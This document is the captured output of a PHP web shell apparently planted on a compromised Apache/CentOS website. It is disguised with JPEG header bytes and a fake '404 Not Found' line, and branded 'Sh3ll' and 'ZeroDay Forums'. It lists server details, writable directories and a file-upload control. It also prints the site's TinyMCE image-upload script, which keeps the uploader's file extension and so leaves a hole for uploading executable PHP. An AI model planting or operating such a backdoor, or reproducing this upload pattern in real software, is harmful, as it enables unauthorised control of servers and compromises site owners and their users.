����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/thietkeweb2/code/admin/tinymce_upload/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/www/html/thietkeweb2/code/admin/tinymce_upload/index.php
<?php
if (isset($_FILES['file'])) {
    $file = $_FILES['file'];
    $webPath = isSecureImageUpload($file);
    echo json_encode(['location' => $webPath]);
} else {
    http_response_code(400);
    echo json_encode(['error' => 'No file uploaded.']);
}
function isSecureImageUpload($file) {
    // 1. Check for upload errors
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return false; // Upload failed
    }
    // 2. Check file size (adjust as needed)
    $maxFileSize = 2 * 1024 * 1024; // 2MB
    if ($file['size'] > $maxFileSize) {
        return false; // File too large
    }
    // 3. Check MIME type (using both file info and getimagesize)
    $allowedMimeTypes = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
    $fileInfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimeType = finfo_file($fileInfo, $file['tmp_name']);
    finfo_close($fileInfo);
    if (!in_array($mimeType, $allowedMimeTypes)) {
        return false; // Invalid MIME type
    }
    // 4. Double-check image dimensions/type using getimagesize
    $imageInfo = @getimagesize($file['tmp_name']); // Suppress warnings with @
    if ($imageInfo === false || !in_array($imageInfo['mime'], $allowedMimeTypes)) {
        return false; // Not a valid image or incorrect type
    }
    // 5. Generate a secure, unique filename
    $extension = pathinfo($file['name'], PATHINFO_EXTENSION);
    $safeFilename = uniqid('img_', true) . '.' . strtolower($extension);
    // 6. Define the target directory (ensure it exists and is writable)

    $foler = 'upload/editor/'.date('Y').'/'.date('m');
    if(!is_dir($foler)) {
        mkdir($foler, 0755, true);
    }
    $targetDirectory = $foler.'/'; // Change this!
    // 7. Prevent directory traversal attacks
    $targetPath = $targetDirectory . basename($safeFilename);
    // 8. Move the uploaded file
    if (!move_uploaded_file($file['tmp_name'], $targetPath)) {
        return false; // Failed to move file
    }
    // 9. Return the safe filename or full path
    return $targetPath; // or $targetPath, as needed
}
?>

ZeroDay Forums Mini